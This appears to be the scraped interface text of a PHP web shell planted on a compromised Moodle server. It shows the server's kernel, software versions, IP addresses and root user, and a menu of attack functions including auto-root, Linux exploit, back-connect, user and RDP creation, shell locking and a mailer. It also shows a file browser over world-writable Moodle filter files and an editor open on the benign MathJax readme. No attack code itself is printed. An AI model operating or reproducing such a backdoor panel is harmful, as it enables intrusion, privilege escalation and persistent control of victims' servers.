Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
filter /
mathjaxloader /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
yui
[ DIR ]
drwxrwxrwx
filter.php
9.96
KB
-rwxrwxrwx
readme_moodle.txt
998
B
-rwxrwxrwx
settings.php
3
KB
-rwxrwxrwx
styles.css
58
B
-rwxrwxrwx
thirdpartylibs.xml
144
B
-rwxrwxrwx
version.php
1.06
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of MathJAX library integration in Moodle ==================================================== * Default MathJax version: 2.7.8 * License: Apache 2.0 * Source: https://www.mathjax.org/ This library is not shipped with Moodle, but this filter is provided, which can be used to correctly load MathJax into a page from the CDN. Alternatively you can download the entire library and install it locally, then use this filter to load that local version. Upgrading the default MathJax version ------------------------------------- 1. Update the default CDN URL in settings.php 2. Perform an upgrade step to change the configured URL if it matches the previous default. 3. Check and eventually update the list of language mappings in filter.php. Also see the unit test for the language mappings. Changes ------- * The MathJax 2.7.2 seems to have a possible security issue, the CDN default value have been updated to point to the recommended 2.7.8 version. See MDL-68430 for details.
Close